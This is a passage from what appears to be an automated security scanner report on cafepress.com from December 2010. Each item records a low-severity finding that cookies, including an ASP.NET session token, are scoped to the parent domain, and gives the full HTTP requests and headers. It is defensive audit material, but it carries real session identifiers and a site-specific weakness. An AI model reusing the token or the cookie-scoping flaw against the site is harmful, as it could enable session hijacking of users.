s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59255 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+eat_sleep_game_light_tshirt,299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93204 Date: Sun, 26 Dec 2010 13:49:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.17. http://www.cafepress.com/+framed-prints
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+framed-prints
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 63735 Date: Sun, 26 Dec 2010 13:48:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.18. http://www.cafepress.com/+greeting_cards
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+greeting_cards
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59651 Date: Sun, 26 Dec 2010 13:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.19. http://www.cafepress.com/+hats-caps
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+hats-caps
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59393 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.20. http://www.cafepress.com/+ipad-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+ipad-cases
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 88266 Date: Sun, 26 Dec 2010 13:44:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.21. http://www.cafepress.com/+iphone-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+iphone-cases
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 65212
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
